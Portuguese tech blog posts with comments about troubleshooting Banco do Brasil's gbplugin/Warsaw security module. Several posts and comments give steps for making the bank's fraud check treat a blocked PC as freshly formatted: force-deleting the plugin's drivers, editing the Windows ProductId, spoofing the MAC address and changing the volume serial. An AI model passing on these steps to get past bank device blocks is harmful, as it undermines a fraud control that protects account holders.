O plugin de segurança do Banco do Brasil não instala? Veja seu proxy.

Jefferson, 07 de setembro de 2014, , ,

Eu perdi duas horas com isso em um cliente, mas admito que deveria ter desconfiado antes. O sintoma é que ao rodar o DiagnosticoBB, este dá erro na instalação do Stormfish, mas não diz a razão. Mas quando olhei o log que o programa faz desconfiei da configuração de proxy e era isso mesmo. Algum malware quie nem estava mais na máquina havia configurado um proxy que provavelmente estava bloqueando baixar o Stormfish.

Bastou apagar a configuração para conseguir instalar o módulo.

Por conta desse tipo de coisa e o fato de que em quase 100% dos casos quando um proxy está configurado é ato de malware, eu até adicionei a um programa de testes que eu fiz o teste da existência de um proxy, para me avisar quando eu esquecer de olhar.

07 de setembro de 2014 | Tags: , , | Categorias: Sem categoria | %
10 comentários
  • Daniel - 29 Comentários
    12/09/2014 at 16:15 · Responder

    Ryan,

    No meu PC, o plugin instala para o Firefox, mas não instala no Chrome. Até fui na opção de download direto do Stormfish oferecido pelo site do BB, baixei, instalei, não deu erro, mas continuo não conseguindo acesso pelo Chrome. Alguma sugestão do que devo tentar? Obrigado. Daniel

    • Jefferson - 6.606 Comentários
      13/09/2014 at 15:05 · Responder

      Eu tentaria uma versão mais antiga do Chrome, talvez na forma de versão portable. O Chrome é uma praga mutante e não duvido nada que uma atualização tenha quebrado a compatibilidade com o plugin. Mas eu ainda não esbarrei nesse problema.

    • Wilson - 2 Comentários
      05/04/2015 at 20:28 · Responder

      No chrome va ate clique no menu acima a direita depois da barra de pesquisa clique nele vai abrir uma janela clique em configurações ao abrir a janela clique em extensões na parte esquerda superior logo abaixo das extensões que tiver instalada esta tem uma opção a esquerda inferior (obter mais extensão) clique e vai abrir outra janela , novamente a esquerda superior tem uma barrinha de pesquisa digite ( banco do Brasil) você tem que estar online veja na sua pesquisa ira aparecer vários itens na pesquisa entre eles GBBD do banco do Brasil. Obs: poderá aparecer igual, e esta escrito na frente (avaliar) não recomendo escolher esse, pois instalei o outro e funcionou na hora nem precisei reiniciar o micro. :yahoo:

      • Wilson - 2 Comentários
        05/04/2015 at 20:33 · Responder

        Me desculpem a falha no post anterior. :rtfm: Daniel, No chrome va ate o menu acima a direita depois da barra de pesquisa. :yahoo:

      • Juninho - 1 Comentário
        27/06/2015 at 10:06 · Responder

        Você me ajudou velho.. muito obrigadoooo! :yahoo:

      • Aldo Quintino - 1 Comentário
        04/04/2017 at 20:51 · Responder

        Meu amigo Wilson segui seus passos e parei no “vários itens na pesquisa entre eles GBBD do Banco do Brasil, qual o passo seguinte, só um comentário no meu não apareceu a opção GBBD. Grato pela atenção.

  • Marcsson - 1 Comentário
    19/12/2014 at 11:23 · Responder

    Pelo chrome voce vai em opções – complementos – manda procurar, procure banco do brasil e instale o modulo de segurança.
    Pronto.

  • Fábio - 2 Comentários
    28/01/2015 at 15:25 · Responder

    O instalador do malware da GAS usa as configurações de internet do IE.

    Estava com o mesmo problema com a Caixa, sou usuário do Firefox e não conseguia instalar o adicional de segurança da Caixa, depois de muitas tentativas, verifiquei que o IE estava configurado para o modo offline, o que impedia a instalação.

  • Edson - 1 Comentário
    30/03/2015 at 9:47 · Responder

    Pô valeu mesmo ja tava sem saber o que fazer , ate antivirus eu troquei e era apenas a b osta do proxy no internet explore.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

O caso da senhora que queria rodar programas Windows no tablet Android.

Jefferson, 07 de setembro de 2014,

Uma discussão que estou tendo agora em uma lista que está rodando em torno da ignorância (sem intenção de desrespeitar) do usuário comum me fez lembrar de um caso que aconteceu há mais de um ano quando eu visitava uma cliente. A mãe dela veio me perguntar se eu podia ajudá-la a instalar um jogo de paciência (cartas) no tablet porque ela vinha tentando há muito tempo e não conseguia. Eu pedi a ela que me mostrasse o que ela tinha tentado e para meu espanto ela abriu o browser no Google, colocou “Jogo de Paciência” na busca e mostrou os resultados. Disse que tentou instalar tudo o que achou, sem sucesso (é claro).

O choque foi grande. Eu nunca esperaria que o usuário fosse por esse caminho, mas depois de passado o susto eu percebi que eu deveria ter imaginado. Eu expliquei a ela porque não tinha dado certo e orientei a usar o Google Play. Até baixei e instalei um jogo na frente dela.

Se o resultado de uma busca dessas fosse primariamente de aplicações Android e o Android permitisse a fácil instalação de APKs baixados via browser, ela estaria com o tablet “completamente dominado”.

Se o Google servisse resultados específicos baseados no tipo de aparelho que ela usava, não seria perfeitamente possível um autor de malware explorar isso para oferecer um trojan completo com explicações de como fazer a instalação? Alguém duvida de que essa senhora seguiria essas instruções? Eu não.

 

 

 

 

07 de setembro de 2014 | Tags: | Categorias: Sem categoria | %
Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Seu PC foi infectado? O suporte do Banco do Brasil quer que você formate.

Jefferson, 06 de setembro de 2014, , , ,

Já aconteceu com dois clientes empresariais meus. O Banco do Brasil detecta que a máquina foi comprometida e não adianta remover o vírus e ir ao banco trocar senha. O acesso ao banco continua bloqueado. Ao ligar para o suporte a resposta é a mesma: “formate a máquina”.

O primeiro cliente achou que era melhor formatar mesmo. Eu fiz um backup dos dados, usei a recuperação do sistema do Windows 8 para deixar a máquina do jeito que foi comprada e restaurei os dados. O BB parou de implicar. Esse cliente só usa esse computador para acessar banco e ver emails então “formatar” não é tão assustador.

Mas na segunda vez que o suporte saiu com essa o próprio cliente (era outro) achou que era demais, porque era uma máquina muito mais complexa, com muitos softwares específicos, feitos exclusivamente para a empresa, para instalar. E várias operações da empresa (um supermercado) iam ficar paralisadas durante o processo. O cliente sabia por experiência anterior que ia levar dias para deixar a máquina do jeito que era. Então me chamou para resolver.

Localizei e removi o malware, consertei a instalação detonada do Avast, mas já sabia pela minha experiência anterior que isso não seria suficiente para aplacar a fúria dos deuses do BB. Apenas um sacrifício em forma de formatação seria aceito. Então tentei algo simples para simular a formatação que aparentemente funcionou. Usei o Autoruns para determinar onde estavam os arquivos relacionados ao plugin de segurança (gbplugin) e um LiveCD para removê-los.

Aparentemente deu certo. Já faz duas semanas que o cliente não fala nada.

04/10/2018: Eu vinha fazendo isso sem problemas há quatro anos, mas a situação agora é outra.

06 de setembro de 2014 | Tags: , , , | Categorias: Sem categoria | %
41 comentários
  • Ricardo Macagnan - 5 Comentários
    06/09/2014 at 17:19 · Responder

    Infelizmente este plugin é um “mal necessário”. Já suspeitava que ele causava lentidão nos micros e sabia que era “tinhoso” para ser removido e existia a possibilidade do plugin ser infectado. Agora, que porcaria de suporte tem o BB? Manda formatar e o usuário que se exploda? O BB se responsabilizaria pelos estragos causados? Sim, porque se um técnico formata um micro, ele é responsável por deixá-lo em ordem ou suportar os chamados do cliente. Não seria melhor trocarem de plugin?

  • Julio Cezar - 1 Comentário
    15/01/2016 at 16:26 · Responder

    Boa tarde Jefferson,

    Como vc efetuou essa simulação?

    • Jefferson - 6.606 Comentários
      15/01/2016 at 19:10 · Responder

      Está explicado no texto: removi o plugin na marra. O banco dificilmente tem como saber que você “formatou” sua máquina. Como eu já tinha removido o malware, a única coisa que faltava para eu simular uma formatação do ponto de vista do banco era remover o plugin.

      Não é a GAS Informática que quer que você formate. Se fosse, ela espalharia coisas pelo Registro para indicar que você não formatou. É o suporte imbecil do BB que quer.

      18/12/2018: O banco agora sabe quando você não formatou sua máquina

      • Valdir - 2 Comentários
        20/06/2017 at 16:29 · Responder

        Vc removeu o auto run pelo regedit ?

        • Jefferson - 6.606 Comentários
          20/06/2017 at 19:16 · Responder

          Valdir, desculpe, mas este é um blog voltado para usuários avançados.

          • Valdir - 2 Comentários
            21/06/2017 at 9:35 · Responder

            Consegui seguindo a sua dica de desinstalar o plugin e parando o plugin pelo gerenciador de tarefas do Windows 10 depois fui na pasta arquivo de programas e rebomeis todos os arquivos da pasta plugin, só um que não deu. Aí reiniciei o pc e funcionou. Ou seja e bem mais fácil. Mas antes passei um antivírus ( avast ) e o malwarebytes. Obrigado pela dica !! :clapping:

          • Daniel - 1 Comentário
            18/12/2018 at 8:41 · Responder

            Jefferson, me desculpe, mas você assustou os usuários com toda essa “problematização” da situação que em muitos casos pode ser resolvida de forma simples.

            Para quem estiver acompanhando o tópico, seja usuário avançado ou usuário “leigo”. Segue uma solução simples:

            Verifique se seu navegador Google Chrome tem a extensão IBM Security Rapport instalada, pois no caso da minha empresa, foi apenas removê-la que a situação normalizou.

            Atenciosamente,
            Daniel

            Analista de Infraestrutura Sênior
            Pós graduado em Gestão do Conhecimento e Tecnologias da Informação
            Especialista em Segurança, certificado CISSP, CompTIA Security+, EC-Council Ethical Hacker e ISACA CISM.

            • Jefferson - 6.606 Comentários
              18/12/2018 at 10:32 · Responder

              Nooossa. Era para eu ficar impressionado com essa sua assinatura?

              Todos esses diplomas e certificados e você não percebeu que esse post foi escrito em 2014?

              Todos esses diplomas e certificados e você *se percebeu* que esse post foi escrito em 2014 não acha relevante?

              Todos esses diplomas e certificados e você não percebeu que a única pessoa a usar a palavra “Chrome” em toda essa página, em 4 anos, foi você? Você acha que o Google Chrome é o único navegador instalado na máquina? Acha que é o único que pode ser usado para acessar a bancos? Acha que todo mundo é estúpido o bastante para não tentar com outros navegadores? Acha que uma extensão instalada no Google Chrome afeta o uso de outros navegadores?

              Todos esses diplomas e certificados e você não se deu ao trabalho de seguir o link que adicionei ao post mostrando que a situação agora é muito pior?

              “basta remover uma extensão no chrome”

              HAHAHAHAHAHAHA

              Nota: tirando o primeiro parágrafo do seu texto e sua exibição ridícula de diplomas, eu não faria qualquer objeção ao seu comentário, porque entendo perfeitamente que o seu caso era o seu caso.

      • Cássio Silva - 1 Comentário
        05/07/2017 at 12:40 · Responder

        Olá Jefferson. Entendi que é um espaço para usuários avançados mas muitas pessoas leigas como eu estão sofrendo com ele problemas. Haveria alguma forma de divulgar uma rotina que consigamos fazer para resolver? Seria uma gentileza da sua parte e uma utilidade pública. Obrigado e parabéns.

        • Jefferson - 6.606 Comentários
          05/07/2017 at 13:07 · Responder

          É impossível para mim descrever um processo que atenda a todos os públicos. A cada frase eu me pergunto “o usuário sabe o que é isso?” Tem usuário que sabe o que é “extensão do arquivo” e tem usuário que acha que esta se mede em bytes.

          O procedimento para um usuário avançado, que pode ter que ser adaptado à sua versão do Windows, é o seguinte:

          Obviamente, sempre trabalhe desativando todas as opções de ocultar arquivos do Windows.

          Usando um LiveCD

          Em “Arquivos de Programas”, “Program Files” e “Arquivos de Programas (x86)” Apague todas as pastas que tenham os seguintes nomes:

          • Gas Informatica
          • Diebold
          • gbplugin -esta é a mais importante, pois é onde está o driver que impede você de realmente apagar tudo.
          • Warsaw

          A partir deste ponto você não precisa mais do LiveCD e pode apagar/desativar tudo usando o Windows da máquina mesmo.

          Faça o mesmo em

          • c:\ProgramData
          • c:\users\NOME DO USUARIO\Appdata\Local
          • c:\users\NOME DO USUARIO\Appdata\LocalLow
          • c:\users\NOME DO USUARIO\Appdata\Roaming

          Aproveite para apagar todo o conteúdo de

          • c:\users\NOME DO USUARIO\Appdata\Local\Temp\
          • c:\windows\temp\

          Usando o Autoruns, na seção Drivers ou Services, procure por todos os arquivos relacionados à GAS e desative-os
          Existem pelo menos dois com nome gb*.* e mais um ou dois que começam com a letra W.

          Anote seus nomes e depois apague-os. Eles devem estar todos em c:\windows\system32\drivers\

          Alguns deles:

          • gbpkm.sys
          • gbpndisrd.sys – apagar este é que faz perder o acesso à rede
          • wsddfac.sys
          • wsddpp.sys

          Abra todas as conexões de Rede da máquina e nas propriedades de TCP/IP desative qualquer filtro relacionado à GAS, ou a conexão com a rede não funcionará porque os filtros foram apagados.

          Por último, use o Voidtools Everything para procurar por qualquer referência a “gbplugin”, “warsaw” ou “gas” e até pelos nomes de drivers acima no HDD. Você pode ter deixado de ver algo e o Everything é muito útil inclusive para achar pastas virtualizadas.

          Reinicie a máquina. Isso deverá ser suficiente para que o BB ache que a máquina foi formatada.

          18/12/2018: O banco agora sabe mesmo quando você não formatou sua máquina

          • Luiz Américo - 2 Comentários
            07/03/2018 at 21:04 · Responder

            Depois de sofrer alguns dias para desbloquear meus computadores sem formatá-los, descobri uma saída simples e eficaz. Para leigos ou com pouca experiência em informática, peçam ajuda para quem já tem um pouco de conhecimento. No menu de pesquisa, execute o programa regedit e no programa que vai abrir, clique em editar e depois escolha localizar e no espaço que aparece escreva a palavra Brasil e a seguir clique a tecla F3 do teclado que toda frase que aparecer com a palavra Brasil relacionada ao Banco do Brasil, apague apertando a tecla delete. Não apague frases que tem a palavra Brasil referentes à linguagem. A cada F3 que Vc teclar, irão aparecer frases com referentes ao Banco do Brasil. Depois desta limpeza, abra o site do banco e proceda toda instalação que ele pedir, no final não irá mais aparecer “computador bloqueado, entre em contato com sua agência” ou outras frases parecidas, porque agora o computador funcionará como se formatado fosse para o efeito de Vc entrar na sua conta. Repito: mexer no comando regedit é coisa séria, somente para profissionais de informática, pois se Vc apagar alguma coisa por engano, poderá danificar seus programas….

          • Rogerio - 1 Comentário
            27/06/2018 at 11:35 · Responder

            Olá Jefferson.
            Estava com o problema no Banco do Brasil de formatação do PC.
            Liguei para central BB e pedia que eu formatasse o meu computador.
            Realmente estava com vírus e este peguei quando fiz do meu celular ponto de WiFi “ROTEADOR” para meu notebook.
            Realmente o sistema de Segurança do Banco funcionou e protegeu de ameaça pela internet. Deu trabalho para voltar e operar normalmente o site do BB.
            Fiz tudo que você recomendou.. usei o REDEGIT e exclui tudo que tinha referencia ” Gas Informatica; Diebold; Warsaw , também nos diretórios ativos e ocultos pelo sistema. Como complemento usei o programa de limpeza o “adwcleaner_7.2.0.exe” e abri “executei” no modo de Seguranca do Windows. Também usei o programa CCleaner para limpar os registros de sistemas. Apague antes o arquivo que voce baixou do BB o ” diagnosticobb.exe” antigo..e baixe de novo o arquivo “diagnosticobb.exe” depois de ter feito toda limpeza no PC.. Sempre reinicie a máquina cada operação. Fiz assim deu tudo certo.. tudo funcionante sem bronca no site do BB sem usar a formatação.
            Agradeço muito pelas dicas

  • VR5 - 397 Comentários
    21/06/2017 at 9:40 · Responder

    Bradesco já possui um, digamos, “app proprietário” para se acessar sem depender de navegador. Itaú também… não sei se Santander já. QUANDO o BB terá algo parecido? :rtfm:

  • Mauricio Lino - 1 Comentário
    03/07/2017 at 10:19 · Responder

    Então a remoção do plugin deve ser direcionada somente ao ítem BB?

  • Taís - 1 Comentário
    15/07/2017 at 15:49 · Responder

    Jefferson, depois desse processo todo, você reinstalou os módulos de proteção do BB?

    E obrigada pelas instruções. Farei um back up dos meus arquivos e depois tentarei segui-las. Minha senha já foi bloqueada duas vezes, e meu PC está limpinho, não aguento mais essa situação…

  • Alexandre Bives - 4 Comentários
    09/08/2017 at 18:04 · Responder

    Olá Jefferson, tudo bem?
    já aconteceu com vários clientes aqui, por suspeita virus, e até por troca de IP durante o acesso ao bb.com eles bloqueiam e pedem pra formatar…
    Fiz o que falou, exclui muita coisa, até criei outro usuario mas ainda permanece o bloqueio.

    Você excluiu algo no Registro? Alguém aqui desse topico conseguiu “enganar ” o suporte e instalar um plugin limpo como se tivesse formatado mesmo?

    Será que é so pelo Plugin ou ID do Windows?

    Parabéns Pelo Topico Jefferson!

  • Alexandre Bives - 4 Comentários
    14/08/2017 at 18:19 · Responder

    Sim eu exclui aquelas chaves que pediu ali,

    Só gostaria de saber se funciona realmente. Pq pela lógica, seria excluir o rastro do plugin e criar outro Usuário. Porém eles devem saber algo do ID do Windows. e não do plugin. Pois o mesmo tem que ser liberado, cada Windows (pc) precisa ser liberado pelo suporte do BB,
    A Cada formatação o ID da maquina (Windows) muda.

    Alguém teve sucesso fazendo o tutorial?
    Pois testei aqui até com outro usuário e não funcionou.
    Testei em outro PC aqui ele pede para cadastrar o PC ligando no suporte.
    (Gerenciador Financeiro BB)

  • Snow_man - 311 Comentários
    14/08/2017 at 21:29 · Responder

    Mais uma maravilha do Gbplugin:
    Tela azul no Windows 10, com loop no boot; uma das dlls na pasta do
    windows\system32 do nada zera. Baita dor de cabeça pra descobrir e resolver.

  • Alexandre Bives - 4 Comentários
    28/08/2017 at 16:55 · Responder

    Solução rápida para aqueles que não podem formatar e o suporte do BB bloqueia é criar uma máquina virtual usando Linux . Criei aqui para meu cliente acessar o Gerenciador financeiro e deu certo.

  • Renan - 1 Comentário
    12/09/2017 at 14:16 · Responder

    Galera, quem por um acaso caiu aqui e ainda não resolveu o problema, achei um excelente tutorial para tirar esse GPlugin na marra. Tá tudo bem explicado e tem mais de uma forma de fazer.

    http://www.michaelrigo.com/2015/01/como-remover-gbuster-na-unha.html

    • Snow_man - 311 Comentários
      13/09/2017 at 10:17 · Responder

      Obrigado; nesse site aí tem o passo a passo para montar uma iso Linux com Virtualbox para
      instalar as pragas bancárias.

  • Alan - 1 Comentário
    13/09/2017 at 0:00 · Responder

    Estava com o mesmo problema e no meu caso resolveu-se seguindo este tutorial http://g1.globo.com/tecnologia/blog/seguranca-digital/post/como-corrigir-redirecionamento-de-rede-no-acesso-ao-banco.html.
    O problema estava nas configurações da LAN.
    Espero que ajude.
    Abraço

  • Jefferson - 6.606 Comentários
    13/09/2017 at 0:24 · Responder

    Eu esqueci de frisar uma coisa aqui. Não adianta desinstalar o maldito gbplugin se você não tiver removido o malware e as modificações feitas por ele que fizeram o gbplugin bloquear seu computador. A maioria dos comentários, com a notável exceção deste último de Alan, está se concentrando no gbPlugin e parecendo esquecer do resto.

  • Edvaldo - 1 Comentário
    09/10/2017 at 12:20 · Responder

    Fiz o recomendado pelo Alexandre Bives, baixei o VirtualBox, instalei o Windows 7 na Máquina Virtual, criei o primeiro Snapshot e instalei o módulo de segurança do BB.
    Desta forma se tiver o problema novamente, volto para o primeiro Snapshot.
    Depois de tudo configurado e o acesso ao banco funcionando, crio outro snapshot e oriento aos usuários que quando fechar o VirtualBox marque “Desligar a máquina” e “Restaurar o ultimo snapshot”

    Caso dê algum outro problema, instalo o Windows 7 na Máquina Virtual de novo é rápido.

  • Alexandre Bives - 4 Comentários
    01/11/2017 at 11:01 · Responder

    Que bom que deu Certo, então o caminho mais curto depois do bloqueio do PC pelo suporte é a Maquina Virtual mesmo. Valeu Galera!

  • Fabio - 1 Comentário
    23/11/2017 at 13:55 · Responder

    Boa Tarde,

    Pessoal passei pelo mesmo problema em um pc do financeiro, resolvi da seguinte maneira, fazendo a exclusão dos arquivos Warsan pelo Livecd e trocando na mão o ID do Windows, ai ao instalar o plugin do banco novamente, ele pede o apelido, tudo igual como se tivesse formatado a maquina.

    Procedimento para trocar a ID do Windows, entra no registro, HKRY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion, altere a chave ProductId

  • Johnson Cruz - 1 Comentário
    01/12/2017 at 10:41 · Responder

    Resolvi esse problema recentemente removendo o Warsaw e reinstalando o módulo de segurança do Banco do Brasil pelo site https://seg.bb.com.br
    Contatei a cliente que após recadastrar a máquina com sua chave J novamente por outro notebook conseguiu acessar o banco normalmente. :)

    • Snow_man - 311 Comentários
      04/12/2017 at 13:14 · Responder

      após recadastrar a máquina com sua chave J

      isso também é um problema, pois a pessoa depende de ir na agência, assinar um documento, pra liberar o cadastro do computador. :rtfm:

    • Marco - 1 Comentário
      04/01/2018 at 18:42 · Responder

      Estou com o mesmo problema! Poderia me explicar melhor essa questão da “Chave J”?

  • Luiz Américo - 2 Comentários
    09/03/2018 at 12:01 · Responder

    Depois de sofrer alguns dias para desbloquear meus computadores sem formatá-los, descobri uma saída simples e eficaz. Para leigos ou com pouca experiência em informática, peçam ajuda para quem já tem um pouco de conhecimento. No menu de pesquisa, execute o programa regedit e no programa que vai abrir, clique em editar e depois escolha localizar e no espaço que aparece escreva a palavra Brasil e a seguir clique a tecla F3 do teclado que toda frase que aparecer com a palavra Brasil relacionada ao Banco do Brasil, apague apertando a tecla delete. Não apague frases que tem a palavra Brasil referentes à linguagem. A cada F3 que Vc teclar, irão aparecer frases referentes ao Banco do Brasil. Depois desta limpeza, abra o site do banco e proceda toda instalação que ele pedir, no final não irá mais aparecer “computador bloqueado, entre em contato com sua agência” ou outras frases parecidas, porque agora o computador funcionará como se formatado fosse para o efeito de Vc entrar na sua conta. Repito: mexer no comando regedit é coisa séria, somente para profissionais de informática, pois se Vc apagar alguma coisa por engano, poderá danificar seus programas….

  • Show Time - 1 Comentário
    21/04/2018 at 1:55 · Responder

    Olá, aqui para resolver o problema fiz o seguinte:

    Desinstala o Warshaw no painel de controle e Reinica o PC;
    Verifica qual o MAC da sua placa de rede, copia ele e altera apenas o último dígito para qualquer número diferente;
    Abre as configurações de rede, Propriedades da Conexão que estiver ativa, Avançadas procura por Endereçamento de Rede, e cola o novo “mac” alterado, reinicia o PC
    Instala novamente o Plugin pelo site do BB e pronto, já estará liberado.

    Flw

  • Evandro - 1 Comentário
    08/05/2018 at 19:47 · Responder

    Agradeço a este espaço pelas informações valiosas, através dele consegui resolver meu problema de acesso ao Banco do Brasil, a melhor solução que encontrei foi a instalação de uma máquina virtual, muito bem explicada pelo Blog do Michael
    https://www.michaelrigo.com/2016/03/criando-maquina-virtual-windows-bancos.html?showComment=1525819344044#c7736920337749965255

    Quem quiser conferir recomendo, abraço a todos.

  • Helvecio - 3 Comentários
    23/05/2019 at 9:00 · Responder

    Meu PC tb foi bloqueado pelo BB. Havia virus/malware, limpei de diversas formas (detectado, limpo) mas como vcs sabe não adianta, BB não dá outra chance, prefere impor ao cliente o ônus de uma solução absurda, alegando “segurança” e, em tese, tem que formatar. Fácil e conveniente resolver as coisas assim.
    Vou agregar mais informações.
    1) criei uma VM win10 no virtualbox e não resolveu (mesma cópia de Windows!)
    2) criei uma VM Linux no virtualbox e roda beleza
    Estou tentando uma solução mais cirúrgica, a menos invasiva possível, mínimo de interferência na máquina original.
    Minha intenção é dar a vcs mais subsídios e ajudar coletivamente.
    Quem souber de alguma solução recente fv postar.

    • Helvecio - 3 Comentários
      23/05/2019 at 9:25 · Responder

      outros detalhes:
      – o bloqueio não afetou nem a CEF nem o Itaú no mesmo computador Win10.
      – já tentei troca de MAC e desisntalação
      Fico me perguntando “Aonde está “pegando”?”, tentando evitar uma solução dramática e potencialmente danosa a outras coisas que estão funcionando no computador (no caso o sistema da CEF e Itaú).

      • Jefferson - 6.606 Comentários
        23/05/2019 at 9:33 · Responder

        Você pode tentar trocar o serial do volume do disco, como eu sugiro no próximo post sobre esse assunto.

        • Helvecio - 3 Comentários
          26/05/2019 at 8:32 · Responder

          No SO original eu troquei o volume ID do disco e nao resolveu.
          Na VM o volume ID já era diferente. Na VM o product key do Windows é diferente do product key do SO original da máquina (pressupondo que houvesse bloqueio pelo product key).

          Já o serial number do HD é o mesmo, mesmo depois de reformatar então não acho que seja isto que vá resolver (não testei e procuro ações que têm explicação lógica).

          A pergunta chave é: Aonde fica a “marca” que apaga quando formata mas que não apaga quando se cria uma VM dentro do SO host aonde o bloqueio inicialmente se deu o bloqueio?
          E, ainda para ajudar mais, por quê não tem bloqueio numa VM Linux dentro do SO host aonde originou o bloqueio?

          Eu poderia me dar por satisfeito usando a VM Linux mas queria ir mais a fundo com a ajuda de outras mentes. Eu quero é voltar a usar o SO original sem ter que reformatar e dar uma banana para esta orientação absurda do BB.

    • Snow_man - 311 Comentários
      24/05/2019 at 8:54 · Responder

      Desde que instalei o virtualbox e o Lubuntu nele, uso BB sem problemas.
      (problemas no sistema né, porque dentro do banco ‘as vezes tem kkkk)

      Chatice é o banco ficar oferecendo o tal BB Code que eu não quero, mas a cada acesso
      ao sistema do banco, vem o popup imenso.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Remover o gbplugin inutilizou as conexões de rede? É fácil resolver.

Jefferson, 06 de setembro de 2014, , , ,

Como o maldito gbplugin (o plugin de segurança do Banco do Brasil, Santander e outros) não tem desinstalador você é obrigado a removê-lo na marra com um LiveCD. E para se livrar completamente dele é preciso apagar tanto o diretório Arquivos de Programas\gbplugin quanto os drivers que ele joga em Windows\System32.  Mas justamente apagar esses drivers sem um procedimento de desinstalação “quebra” sua rede, porque pelo menos um deles é instalado como “filtro” e tudo tem que passar por ele. Até mesmo uma solicitação DHCP!

O sintoma é que você sequer consegue obter um endereço IP.

Mas resolver isso até agora foi simples. Nas duas vezes que aconteceu comigo bastou eu usar um dos procedimentos que explico nesta página. É o comando:

netsh int ip reset c:\reset.txt

Isso “reseta” suas conexões de rede para o estado default, com o adicional de explicar tudo o que foi encontrado de errado em c:\reset.txt

Nota: escrever em “c:\” funciona no XP mas pode ser recusado do Vista em diante. Você pode precisar editar isso para que grave em uma pasta.

Na maioria dos casos isso não cria qualquer problema adicional e ainda elimina outros “parasitas” da conexão. Mas é sempre bom olhar o conteúdo de reset.txt para ver se o procedimento não removeu algo de que o usuário vá sentir falta. Por exemplo, programas de controle de uso de banda ou filtros de firewalls também podem acabar sendo removidos.

É possivel editar o Registro para remover especificamente a chamada ao filtro do gbplugin, mas eu não estou encontrando onde eu anotei o caminho. Quando eu achar editarei este post.

06 de setembro de 2014 | Tags: , , , | Categorias: Sem categoria | %
3 comentários
  • Snow_man - 311 Comentários
    21/01/2016 at 19:53 · Responder

    Jefferson, peguei um pc certa vez que tinha umas pragas, rodei adwcleaner, jrt, ccleaner, anti virus/malware, estava tudo normal, só não resolvia DNS, só pingava usando endereços ip. Depois desse comando, voltou a funcionar.
    Maaaas, precisei usar ele de novo essa semana (2x por sinal) e não funcionou. Só me sobrou a formatação. Esqueci de algo?

  • Snow_man - 311 Comentários
    23/01/2016 at 12:00 · Responder

    Olhei as configurações de tcp/ip e estava em ip automático. Em opções de internet, a parte de configurações da rede local não estava com servidor proxy (um local normalmente escolhido por invasores). Não tenho intimidade com services.msc nem agendador de tarefas, e só mexo no registro nas chaves indicadas, pra não bagunçar mais do que já está. Rodei um live cd e a net funcionava normalmente, então não era hardware; optei por backup+formatação :S :(

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Plugin de segurança do Banco do Brasil está transformando PCs em carroças.

Jefferson, 05 de setembro de 2014, , ,

[19/01/2015] quando escrevi este texto, em setembro do ano passado, estava me referindo ao (maldito) gbplugin da Gas Informatica. Hoje existe um segundo plugin usado pelo BB, o Trusteer Rapport, que parece se comportar melhor que o gbplugin. Pelo menos, conforme relatos nos comentários, ele parece permitir ser desativado.

[29/06/2016] Mais de um ano se passou depois que escrevi o comentário acima e o gbplugin continua sendo instalado. O que parecia ser o BB resolvendo o problema (a troca do módulo de segurança) mostrou-se ser o BB aumentando a superfície do problema (agora são dois ou mais).

Há semanas venho tendo problemas com computadores de clientes que ficam inexplicavelmente lentos para o hardware que tem (um dos casos tem um Core i3) e só percebi ao passar pelo último que comum a todos era a necessidade de acessar o Banco do Brasil. O problema ocorre tanto no Windows XP quanto no 7. O Antivirus pode ser Avast, Avira, Norton ou AVG.

Eu desconfiei porque no caso da última cliente o computador funcionou normalmente na minha presença. Quando cheguei lá a lentidão era causada pelo Avira que estava com um serviço travado consumindo 100% da CPU (não aparecia no Gerenciador de Tarefas). Mas quando voltei para casa a cliente ligou dizendo que tornou a ficar lento. Pedi que ela usasse o computador sem fazer acesso ao banco e observasse se o problema só voltava depois de acessar o site. Depois reiniciar e testar de novo. A cliente passou alguns dias em silêncio mas confirmou ontem que a máquina só fica lenta depois de acessar o BB.

Ainda não tenho certeza do que está havendo.

[12/02/2015] O título original deste post era “Plugin de segurança do Banco do Brasil pode estar transformando PCs em carroças”. Eu mudei porque hoje eu tenho certeza de que o malware da GAS é responsável por extrema lentidão em uma infinidade de instalações do Windows. Por que eu chamo a “solução de segurança” da GAS de malware? Ora…

  • Se a coisa se instala na sua máquina, provocando qualquer efeito negativo (e o malware da GAS provoca muitos);
  • Resiste a todas as suas tentativas de desinstalação;
  • Se instala com o objetivo de proteger o acesso bancário, mas está ativo do momento que você liga o computador até desligá-lo e monitora tudo o que você faz no computador, mesmo que você passe dias ou semanas sem acessar um banco. Ora, na maioria das instalações ele está rodando até quando você entra no Modo de Segurança do Windows. E isso para mim já basta para no mínimo configurar um comportamento questionável;
  • É uma caixa preta sem qualquer documentação de comportamento. Você não sabe o que uma determinada versão faz ou deixou de fazer e isso me permite (e obriga a) fazer generalizações a respeito de seu comportamento e efeitos.

